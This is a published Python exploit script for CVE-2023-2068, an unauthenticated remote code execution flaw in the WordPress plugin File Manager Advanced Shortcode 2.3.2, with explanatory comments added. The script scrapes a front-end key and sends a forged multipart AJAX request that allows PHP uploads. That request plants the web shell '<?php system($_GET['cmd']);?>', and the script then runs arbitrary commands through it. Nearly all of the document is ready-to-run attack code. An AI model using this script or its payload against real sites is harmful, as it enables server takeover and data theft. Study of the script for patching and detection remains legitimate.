Authored by Mateus Machado Tesser

File Manager Advanced Shortcode version 2.3.2 suffers from an unauthenticated remote code execution vulnerability: the plugin's admin-ajax handler accepts a PHP file upload from a caller that presents only a value scraped from the public front end, with no WordPress session.

advisories | CVE-2023-2068

# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
# Date: 05/31/2023
# Exploit Author: Mateus Machado Tesser
# Vendor Homepage: https://advancedfilemanager.com/
# Version: File Manager Advanced Shortcode 2.3.2
# Tested on: WordPress 6.1 / Linux (Ubuntu) 5.15
# CVE: CVE-2023-2068

import requests
import json
import pprint
import sys
import re

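# ANSI-coloured status prefixes for console output. The escape character
# (ESC, octal 033) was lost in the published listing ("33[1;34;40m..."),
# which made these print as literal digits; the "\033" prefix is restored.
PROCESS = "\033[1;34;40m[*]\033[0m"
SUCCESS = "\033[1;32;40m[+]\033[0m"
FAIL = "\033[1;31;40m[-]\033[0m"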

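# Usage: <script> IP COMMAND
# IP is the host (or host:port) of the target WordPress site, COMMAND the
# shell command to run through the dropped web shell.
#
# The original wrapped the argv reads in a bare `except: pass`, so a missing
# argument only deferred the failure to a NameError on the first use of IP.
# Fail fast with the usage line and a non-zero exit instead.
if len(sys.argv) < 3:
    print(f'Use: {sys.argv[0]} IP COMMAND')
    sys.exit(1)
IP = sys.argv[1]
COMMAND = sys.argv[2]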

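# Site root of the target WordPress install. The scheme is fixed to http://
# as in the original; change it (or the IP argument) for HTTPS targets.
url = 'http://' + IP + '/'
print(f"{PROCESS} Searching fmakey")

# The plugin embeds a per-site `_fmakey` value in the front-end page; the
# AJAX request built later sends that value and no session cookie, so
# scraping it from an unauthenticated GET is all that is needed here.
# The original swallowed every error and fell through with `fmakey`
# unbound (crashing later with a NameError); abort explicitly instead.
try:
    r = requests.get(url, timeout=10)
    raw_fmakey = r.text
    # Take the first line mentioning _fmakey and the single-quoted value on it.
    fmakey = re.findall(r'_fmakey.*$', raw_fmakey, re.MULTILINE)[0].split("'")[1]
except (requests.RequestException, IndexError):
    fmakey = ''
if not fmakey:
    print(f"{FAIL} Cannot found fmakey!")
    sys.exit(1)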

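print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')
url = "http://" + IP + "/wp-admin/admin-ajax.php"

# Hand-built multipart/form-data body. The published listing lost its
# escape sequences ("rn" for "\r\n", unescaped inner quotes); they are
# restored here and the body is assembled from a field list instead of
# repeated string concatenation.
#
# Security-relevant shape of the request: it targets the plugin's
# `fma_load_shortcode_fma_ui` action with only the scraped `_fmakey`, and
# the same request carries the elFinder connector options
# (`upload_allow=text/x-php`, `operations=upload,download`, ...). Because
# the MIME allow-list is supplied by the caller, the server-side upload
# filter is under attacker control, which is what lets a .php file through.
BOUNDARY = "----WebKitFormBoundaryI52DGCOt37rixRS1"
fields = [
    ("reqid", ""),
    ("cmd", "upload"),
    ("target", "l1_Lw"),  # elFinder volume hash; "Lw" is base64 for "/"
    ("hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]", "exploit.php"),
    ("action", "fma_load_shortcode_fma_ui"),
    ("_fmakey", fmakey),
    ("path", ""),
    ("url", ""),
    ("w", "false"),
    ("r", "true"),
    ("hide", "plugins"),
    ("operations", "upload,download"),
    ("path_type", "inside"),
    ("hide_path", "no"),
    ("enable_trash", "no"),
    ("upload_allow", "text/x-php"),
    ("upload_max_size", "2G"),
]
parts = [
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'
    for name, value in fields
]
# The uploaded file is an unauthenticated web shell: anyone who learns its
# URL can run commands as the web-server user. Delete it from the target
# (and from any backups taken meanwhile) as soon as the test is finished.
parts.append(
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="upload[]"; filename="exploit2.php"\r\n'
    "Content-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"
)
parts.append(
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="mtime[]"\r\n\r\n\r\n--{BOUNDARY}--\r\n'
)
data = "".join(parts)

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",
    "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
    "Accept": "*/*",
}
print(f"{PROCESS} Sending AJAX request to: {url}")
r = requests.post(url, headers=headers, data=data.encode("utf-8"), timeout=30)

# 'errUploadMime' is the elFinder connector's upload-rejected error; an
# HTML (rather than JSON) response means the action never reached the
# connector, typically because the key check failed. Both are failures,
# so exit non-zero (the original exited 0 on these paths).
if 'errUploadMime' in r.text:
    print(f'{FAIL} Exploit failed!')
    sys.exit(1)
if r.headers.get('Content-Type', '').startswith("text/html"):
    print(f'{FAIL} Exploit failed! Try to change _fmakey')
    sys.exit(1)
print(f'{SUCCESS} Exploit executed with success!')

print(f'{PROCESS} Getting URL with webshell')
# The connector reports uploaded files under "added"; the original walked
# the list and kept the last entry's URL, and would have crashed on a
# missing/empty list or non-JSON body. Handle those explicitly.
try:
    exploited = json.loads(r.text)
    shell_url = exploited["added"][-1]['url']
except (ValueError, KeyError, IndexError, TypeError):
    print(f'{FAIL} Unexpected connector response (no "added" entry):\n' + r.text)
    sys.exit(1)

print(f"{PROCESS} Executing '{COMMAND}'")
# `params=` percent-encodes the command. The original appended it raw to
# the URL, so any space, '&' or '#' in COMMAND truncated or corrupted the
# query string and the shell ran something other than what was typed.
r = requests.get(shell_url, params={'cmd': COMMAND}, timeout=30)
print(f'{SUCCESS} The application returned ({len(r.text)} length):\n' + r.text)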